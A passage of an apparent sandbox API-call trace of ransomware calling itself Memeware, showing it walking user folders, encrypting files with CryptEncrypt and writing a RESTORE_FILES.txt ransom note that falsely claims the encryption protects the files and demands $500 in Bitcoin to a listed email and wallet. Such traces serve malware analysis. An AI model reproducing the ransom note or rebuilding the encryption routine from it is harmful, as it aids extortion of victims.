halpmcxz\\appdata\\roaming\\microsoft\\speech\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.375] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.375] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.375] lstrlenA (lpString="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") returned 684 [0090.375] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.375] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.375] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.375] CloseHandle (hObject=0xd8) returned 1 [0090.375] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.376] lstrcmpiW (lpString1="SystemCertificates", lpString2="Windows") returned -1 [0090.376] lstrcmpiW (lpString1="SystemCertificates", lpString2="Program Files") returned 1 [0090.376] lstrcmpiW (lpString1="SystemCertificates", lpString2="Program Files (x86)") returned 1 [0090.376] lstrcmpiW (lpString1="SystemCertificates", lpString2="$Recycle.bin") returned 1 [0090.376] lstrcmpiW (lpString1="SystemCertificates", lpString2="System Volume Information") returned 1 [0090.376] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned 78 [0090.376] lstrcmpW (lpString1="SystemCertificates", lpString2=".") returned 1 [0090.376] lstrcmpW (lpString1="SystemCertificates", lpString2="..") returned 1 [0090.376] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned 80 [0090.376] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.376] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.376] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 
[0090.376] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.376] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.376] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.376] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\.") returned 80 [0090.376] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.376] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.376] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.376] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.376] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.376] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.377] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.377] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.377] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.377] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.377] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.377] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\..") returned 81 [0090.377] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.377] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.377] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.377] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.377] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.377] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.377] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.377] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.377] lstrcmpiW (lpString1="My", lpString2="Windows") returned -1 [0090.377] lstrcmpiW (lpString1="My", lpString2="Program Files") returned -1 [0090.377] lstrcmpiW (lpString1="My", lpString2="Program Files (x86)") returned -1 [0090.377] lstrcmpiW (lpString1="My", lpString2="$Recycle.bin") returned 1 [0090.377] lstrcmpiW (lpString1="My", lpString2="System Volume Information") returned -1 [0090.377] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned 81 [0090.377] lstrcmpW (lpString1="My", lpString2=".") returned 1 [0090.377] lstrcmpW (lpString1="My", lpString2="..") returned 1 [0090.377] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned 83 [0090.377] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0090.377] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.377] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.377] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.377] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.377] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.377] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\.") returned 83 [0090.377] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.377] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.377] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.378] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.378] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.378] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.378] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.378] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.378] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.378] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.378] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.378] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\..") returned 84 [0090.378] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.378] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.378] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.378] lstrcmpW (lpString1="..", 
lpString2="RESTORE_FILES.txt") returned -1 [0090.378] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.378] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.378] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.378] lstrcmpiW (lpString1="Certificates", lpString2="Windows") returned -1 [0090.378] lstrcmpiW (lpString1="Certificates", lpString2="Program Files") returned -1 [0090.378] lstrcmpiW (lpString1="Certificates", lpString2="Program Files (x86)") returned -1 [0090.378] lstrcmpiW (lpString1="Certificates", lpString2="$Recycle.bin") returned 1 [0090.378] lstrcmpiW (lpString1="Certificates", lpString2="System Volume Information") returned -1 [0090.378] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned 94 [0090.378] lstrcmpW (lpString1="Certificates", lpString2=".") returned 1 [0090.378] lstrcmpW (lpString1="Certificates", lpString2="..") returned 1 [0090.379] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned 96 [0090.379] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0090.379] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.379] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.379] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.379] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.379] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.379] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\.") returned 96 [0090.379] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.379] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.379] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.379] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.379] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.379] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.379] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.379] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.379] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.379] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.379] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.379] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.379] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\..") returned 97 [0090.379] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.379] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.379] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.379] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.379] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.379] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.380] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0090.380] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0090.380] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\RESTORE_FILES.txt") returned 112 [0090.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.380] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.380] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0090.381] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.381] WriteFile (in: hFile=0x150, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0090.381] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.381] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0090.381] CloseHandle (hObject=0x150) returned 1 [0090.381] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.381] lstrcmpiW (lpString1="CRLs", lpString2="Windows") returned -1 [0090.381] lstrcmpiW (lpString1="CRLs", lpString2="Program Files") returned -1 [0090.382] lstrcmpiW (lpString1="CRLs", lpString2="Program Files (x86)") returned -1 [0090.382] lstrcmpiW (lpString1="CRLs", lpString2="$Recycle.bin") returned 1 [0090.382] lstrcmpiW (lpString1="CRLs", lpString2="System Volume Information") returned -1 [0090.382] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned 86 [0090.382] lstrcmpW (lpString1="CRLs", lpString2=".") returned 1 [0090.382] lstrcmpW (lpString1="CRLs", lpString2="..") returned 1 [0090.382] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned 88 [0090.382] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 
[0090.382] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.382] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.382] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.382] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.382] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.382] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\.") returned 88 [0090.382] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.382] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.382] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.382] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.382] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.382] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.382] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.382] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.382] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.382] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.382] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.382] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.382] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\..") returned 89 [0090.382] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.382] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.382] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.382] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.382] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.382] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.383] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.383] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0090.383] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0090.383] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\RESTORE_FILES.txt") returned 104 [0090.383] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.383] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
